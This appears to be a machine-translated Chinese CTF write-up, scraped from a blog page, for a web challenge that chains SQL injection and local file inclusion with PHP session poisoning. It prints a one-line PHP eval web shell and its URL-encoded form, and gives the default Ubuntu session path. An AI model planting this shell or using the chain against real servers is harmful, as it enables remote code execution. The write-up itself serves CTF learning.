当前位置:网站首页>Primary school, session 3 - afternoon: Web_ sessionlfi
Primary school, session 3 - afternoon: Web_ sessionlfi
2022-06-30 19:51:00 【Part 02】
Sweep out
login.php
table.php
login.php The source code has a hint table.php?id
table.php Error with injection
If there is no prompt, you can fuzz Out
Through a simple sql Injection obtained account number - password
Get into home.php
Can read files
I can't read /flag.txt
Grab the bag
user_pref The value of is the value we entered , There are loopholes
php 5.4.6 Generated by the server session id
for example :
sess_00nrqa20hjrlaiac0eu726i4q5
sess_89j9ifuqrbplk0rti2va2k1ha0
sess_g2rv1kd6ijsj6g6c9jq5mqglv5
In the response package, you can see that the server uses ubuntu
Ubuntu Default session conversation :
php5 sessions in /var/lib/php5
You can really access
Put the pony URL Full character encoding
<?php eval($_GET[1]);?>
%3c%3f%70%68%70%20%65%76%61%6c%28%24%5f%47%45%54%5b%31%5d%29%3b%3f%3e
%20 Is a space , Connect /
Successful implementation , Next, just read
边栏推荐
- 派尔特医疗在港交所招股书二次“失效”,上市计划实质性延迟
- 码蹄集 - MT3111· 赋值
- 说实话ThreadLocal真不是啥高级的东西
- 企业中台规划和IT架构微服务转型
- Growth summer challenge is coming, exclusive community welfare is coming ~ get CSDN customized T-shirt for free
- 一文读懂目标检测:R-CNN、Fast R-CNN、Faster R-CNN、YOLO、SSD「建议收藏」
- Detailed explanation of specific methods and steps for TCP communication between s7-1500 PLCs (picture and text)
- 2022 最新 JCR正式发布全球最新影响因子名单(前600名)
- VR全景添加对比功能,让差异化效果展示更直观!
- 测试必备工具 —— Postman实战教程
猜你喜欢
SQL continuous login problem
测试人进阶技能:单元测试报告应用指南
Kubevela 1.4: make application delivery safer, easier to use, and more transparent
ABAQUS 2022最新版——完善的现实仿真解决方案
Idle fish is hard to turn over
mysql统计账单信息(上):mysql安装及客户端DBeaver连接使用
盘点华为云GaussDB(for Redis)六大秒级能力
说实话ThreadLocal真不是啥高级的东西
Force deduction ----- count the string containing the given prefix
QQmlApplicationEngine failed to load component qrc:/main.qml:-1 No such file or directory
随机推荐
解决arm_release_ver of this libmali is ‘g2p0-01eac0‘,rk_so_ver is ‘4‘,libgl1-mesa-dev不会被安装,存在未满足的依赖关系
Go language learning tutorial (13)
The project is configured with eslint. When the editor does not close the eslint function, the eslint does not take effect
Promise从认识到使用
Graduates
一文读懂目标检测:R-CNN、Fast R-CNN、Faster R-CNN、YOLO、SSD「建议收藏」
达梦数据库重新初始化实例操作记录
码蹄集 - MT3435 · 赋值 - 二分图问题 - 图文讲解
Makefile笔记(一文学会Makefile)
Application of VoIP push in overseas audio and video services
超视频时代的音视频架构建设|Science和英特尔联袂推出“架构师成长计划”第二季
如何做好测试用例设计
【NLP】【TextCNN】 文本分类
1. 爬虫之Beautifulsoup解析库&在线解析图片验证码
为什么数字化转型战略必须包括持续测试?
Why do more and more people choose cloud rendering?
VR全景拍摄为什么要加盟?巧借资源实现共赢
mysql统计账单信息(上):mysql安装及客户端DBeaver连接使用
Audio and video architecture construction in the super video era | science and Intel jointly launched the second season of "architect growth plan"
线上线下双结合,VR全景是家具线上转型好方法!